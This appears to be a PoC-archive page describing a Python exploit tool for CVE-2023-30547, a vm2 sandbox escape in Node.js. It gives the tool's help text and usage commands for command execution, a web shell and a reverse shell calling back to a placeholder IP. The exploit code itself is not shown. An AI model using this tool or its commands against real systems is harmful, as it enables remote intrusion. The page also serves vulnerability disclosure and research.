关联漏洞
标题:
vm2 注入漏洞
(CVE-2023-30547)
描述:vm2是捷克Patrik Simek个人开发者的一个 Node.js 的高级虚拟机/沙盒。以使用列入白名单的 Node 内置模块运行不受信任的代码。 vm2 3.9.17之前版本存在注入漏洞,该漏洞源于异常清理存在漏洞,攻击者利用该漏洞可以引发未清理的主机异常,该异常可用于逃逸沙箱并在主机上下文中运行任意代码。
描述
Tool for exploring CVE-2023-30547
介绍
# CVE-2023-30547
## Vulnerability description
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.
There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside `handleException()` which can be used to escape the sandbox and run arbitrary code in host context.
## CVE-2023-30547.py
This tool is a simple python script that can be used to explore the vulnerability. It has 4 modes:
- `check`: checks if the target is vulnerable.
- `command_execution`_execution: executes a command on the target.
- `web_shell`: opens a web shell on the target.
- `reverse_shell`: opens a reverse shell on the target.
### Help
```plaintext
usage: CVE-2023-30547.py [-h] -m {check,command_execution,web_shell,reverse_shell} -t TARGET [-c COMMAND] [-p PORT] [-i IP]
Tool for exploring CVE-2023-30547.
options:
-h, --help show this help message and exit
-m {check,command_execution,web_shell,reverse_shell}, --mode {check,command_execution,web_shell,reverse_shell}
Mode to run the tool in.
-t TARGET, --target TARGET
Target to run the tool against.
-c COMMAND, --command COMMAND
Command to execute in exploit mode.
-p PORT, --port PORT Local port to use for reverse shell.
-i IP, --ip IP Local ip to use for reverse shell.
```
### Usage
```bash
python3 CVE-2023-30547.py -m check -t http://url.com/run
python3 CVE-2023-30547.py -m reverse_shell -t domain.com/run -p 1234 -i 10.10.10.10
python3 CVE-2023-30547.py -m web_shell -t domain.com/run
python3 CVE-2023-30547.py -m command_execution -t domain.com -c 'whoami'
```
### References:
- https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244
- https://nvd.nist.gov/vuln/detail/CVE-2023-30547
文件快照
[4.0K] /data/pocs/858251b5c5f1bb24d1ce996292eb62c788524378
├── [6.8K] CVE-2023-30547.py
├── [151K] ldemo.gif
└── [1.9K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。